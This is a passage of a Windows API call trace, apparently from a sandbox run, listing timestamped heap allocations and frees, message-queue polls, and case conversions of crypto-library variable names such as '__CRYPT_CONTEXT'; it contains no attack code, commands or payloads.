Flags=0x0, Size=0x4) returned 0x43e2520 [0089.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0089.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0089.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0089.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0089.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0089.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0089.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0089.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0089.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0089.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0089.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0089.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0089.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0089.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0089.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0089.393] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0089.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0089.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0089.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0089.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0089.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0089.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0089.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0089.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0089.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0089.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0089.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0089.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0089.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0089.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0089.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0089.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0089.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0089.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0089.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.395] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0089.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0089.396] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0089.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0089.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0089.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0089.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0089.396] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0089.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0089.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0089.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0089.396] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0089.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0089.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0089.396] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0089.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0089.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0089.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0089.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0089.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0089.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0089.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0089.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0089.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0089.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0089.397] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0089.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0089.397] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0089.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0089.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0089.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0089.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0089.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0089.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0089.397] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0089.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0089.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0089.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0089.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.397] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0089.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0089.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0089.398] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0089.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0089.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0089.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0089.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0089.398] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0089.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0089.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0089.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0089.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0089.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.398] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0089.398] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0089.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0089.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0089.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0089.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0089.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0089.398] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0089.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0089.399] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0089.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0089.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0089.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0089.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0089.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0089.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0089.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0089.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0089.400] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0089.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0089.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1a8 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0089.400] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0089.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0089.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0089.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0089.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0089.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0089.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0089.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0089.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0089.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0089.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0089.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0089.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0089.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0089.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0089.402] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0089.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0089.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0089.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0089.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0089.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0089.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0089.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0089.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0089.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0089.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0089.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0089.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 